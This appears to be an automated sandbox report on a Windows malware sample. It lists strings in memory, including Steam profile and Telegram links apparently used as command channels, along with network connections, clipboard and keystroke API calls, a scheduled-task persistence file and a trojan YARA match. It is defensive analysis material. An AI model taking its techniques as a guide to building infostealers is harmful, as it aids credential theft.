Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Predicted.pif, 00000012.00000002.4066469500.0000000001878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/EII2991376MIL15JM9WCEETK
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199751190313
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313/badges
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313/inventory/
Source: Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313T
Source: Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313ir3
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.c
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: CFHIIE.18.dr	String found in binary or memory: https://support.mozilla.org
Source: CFHIIE.18.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CFHIIE.18.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp, EHJDGC.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: EHJDGC.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp, EHJDGC.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: EHJDGC.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004BA7000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/pech0nk
Source: Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CBGCAF.18.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Determined.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: CBGCAF.18.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Predicted.pif, 00000012.00000003.3730392668.000000003709B000.00000004.00000800.00020000.00000000.sdmp, CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Predicted.pif, 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Predicted.pif, 00000012.00000003.3730392668.000000003709B000.00000004.00000800.00020000.00000000.sdmp, CFHIIE.18.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943

Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.118.191:443 -> 192.168.2.4:49842 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

8_2_00404BB4

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00274830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

18_2_00274830

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00274632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

18_2_00274632

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00260508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

18_2_00260508

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_0028D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

18_2_0028D164

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.Predicted.pif.49c8038.8.raw.unpack, type: UNPACKEDPE

Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00264254: CreateFileW,DeviceIoControl,CloseHandle,

18_2_00264254

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00258F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

18_2_00258F2E

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		8_2_00403415
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00265778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		18_2_00265778

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_0040447D	8_2_0040447D
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_0040680A	8_2_0040680A
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Code function: 8_2_00406E34	8_2_00406E34
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0020B020	18_2_0020B020
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002094E0	18_2_002094E0
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00209C80	18_2_00209C80
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002223F5	18_2_002223F5
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00288400	18_2_00288400
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00236502	18_2_00236502
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0023265E	18_2_0023265E
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0020E6F0	18_2_0020E6F0
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022282A	18_2_0022282A
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002389BF	18_2_002389BF
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00280A3A	18_2_00280A3A
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00236A74	18_2_00236A74
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00210BE0	18_2_00210BE0
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022CD51	18_2_0022CD51
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0025EDB2	18_2_0025EDB2
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00268E44	18_2_00268E44
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00280EB7	18_2_00280EB7
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00236FE6	18_2_00236FE6
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002233B7	18_2_002233B7
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022F409	18_2_0022F409
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0021D45D	18_2_0021D45D
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0021F628	18_2_0021F628
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00201663	18_2_00201663
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0020F6A0	18_2_0020F6A0
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002216B4	18_2_002216B4
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002278C3	18_2_002278C3
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022DBA5	18_2_0022DBA5
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00221BA8	18_2_00221BA8
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00239CE5	18_2_00239CE5
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0021DD28	18_2_0021DD28
